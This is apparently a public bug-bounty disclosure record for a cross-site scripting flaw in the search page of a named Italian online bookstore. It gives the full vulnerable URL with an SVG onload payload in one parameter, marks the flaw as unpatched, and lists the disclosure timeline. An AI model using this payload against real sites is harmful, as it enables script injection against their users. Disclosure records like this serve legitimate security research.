Vulnerable URL:
http://www.mondadoristore.it/search/?tpr=10&g;=&crc;=&gr;=&gen;=&sgn;=&sg3;=&sg4;=&sg5;=&dsGenere;=&dsSottogenere;=&dsSottogenere3;=&dsSottogenere4;=&dsSottogenere5;=&edt;=&eds;=&aut;=&dsaut;=&pzf;=&pzs;=&scf;=&scs;=&col;=&cdlng;=&formt;=&sort;=&bld;=24&bln;=1&swz;=0&swe;=&escal;=&accum;=&viewmode;=&method;=&per;=&tper;=&dsper;=&cam;=&fa;=&id;=&sgr;=&opnedBoxes;=&gOld;=&dsautOld;=&edsOld;=&cdasd;=&dsasd;=&cdssd;=&dsssd;=&cduniv;=&dsuniv;=&cdaac;=&cdfac;=&dsfac;=&cdcdl;=&dscdl;=&dscdlex;=&cdinseg;=&dsinseg;=&docente;=&searchType;=&bis;=&cs;=x%22%3E%3CsvG%20onLoad=prompt(9)%3E&sid;=
Details:
Description |
Value |
Patched: |
No |
Latest check for patch: |
15.01.2018 |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
27973 |
VIP website status: |
Yes |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
17 October, 2017 17:13 GMT |
Generic security notifications sent to website owner |
17 October, 2017 17:16 GMT |
Notification sent to subscribers (without technical details) |
17 October, 2017 18:17 GMT |
Vulnerability details disclosed by researcher |
15 January, 2018 17:27 GMT |